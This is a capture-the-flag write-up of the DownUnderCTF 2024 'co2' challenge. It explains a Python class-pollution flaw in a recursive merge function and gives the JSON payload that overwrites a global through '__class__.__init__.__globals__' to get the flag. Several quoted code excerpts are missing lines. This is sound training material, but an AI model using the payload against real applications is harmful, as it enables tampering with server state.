
by sealldev
🚩 CTFs DownUnderCTF 2024 rev
Suggested: #prototype-pollution
co2 / DownUnderCTF 2024


A group of students who don't like to do things the "conventional" way decided to come up with a CyberSecurity Blog post. You've been hired to perform an in-depth whitebox test on their web application.

Original Writeup on

We are given the source code which is in Python. The website has a few functions involving account registration, profile viewing, blog posts and a dashboard. But one particular function is of interest, the feedback section.

The /get_flag endpoint checks a flag env variable to get the flag:

def get_flag():
    if flag == "true":
        return "DUCTF{NOT_THE_REAL_FLAG}"
        return "Nope"

Looking at the /save_feedback endpoints function we can see this:

@app.route("/save_feedback", methods=["POST"])
def save_feedback():
    data = json.loads(
    feedback = Feedback()
    # Because we want to dynamically grab the data and save it attributes we can merge it and it *should* create those attribs for the object.
    merge(data, feedback)
    return jsonify({"success": "true"}), 200


def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
            setattr(dst, k, v)

def save_feedback_to_disk(feedback_obj):
    feedback = ""
    for attr in dir(feedback_obj):
        if not attr.startswith('__') and not callable(getattr(feedback_obj, attr)):
            feedback += f"{attr}: {getattr(feedback_obj, attr)}\n"
    feedback_dir = 'feedback'
    if not os.path.exists(feedback_dir):
        print(f"Directory {feedback_dir} created.")
        print(f"Directory {feedback_dir} already exists.")
    files = glob.glob(os.path.join(feedback_dir, '*'))
    if len(files) >= 5:
        oldest_file = min(files, key=os.path.getctime)
        print(f"Deleted oldest file: {oldest_file}")
    new_file_name = os.path.join(feedback_dir, f"feedback_{int(time.time())}.txt")
    with open(new_file_name, 'w') as file:
    print(f"Saved feedback to {new_file_name}")
    return True

Reading up on how the merge works, it turns out Python can have Prototype Pollution (I had my suspects from the challenge name also, good hint lads).

I find a HackTricks Page on the topic (and learn about its absurdity…)


Credits to abdulrah33m for this excellent image

Reading the “Polluting other glasses and global vars through globals” section gives us a good idea of a payload:

def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
            setattr(dst, k, v)

class User:
    def __init__(self):

class NotAccessibleClass: pass

not_accessible_variable = 'Hello'

merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Polluted variable','NotAccessibleClass':{'__qualname__':'PollutedClass'}}}}}, User())

print(not_accessible_variable) #> Polluted variable
print(NotAccessibleClass) #> <class '__main__.PollutedClass'>

The normal post request looks like this:


I then develop our own payload from how the normal post request looks.

{"title":"title","content":"content","rating":"10","referred":"a","__class__": {"__init__":{"__globals__":{"flag":"true"}}}}

/get_flag now returns the flag, as we have modified the flag value to be true.

Flag: DUCTF{_cl455_p0lluti0n_ftw_}

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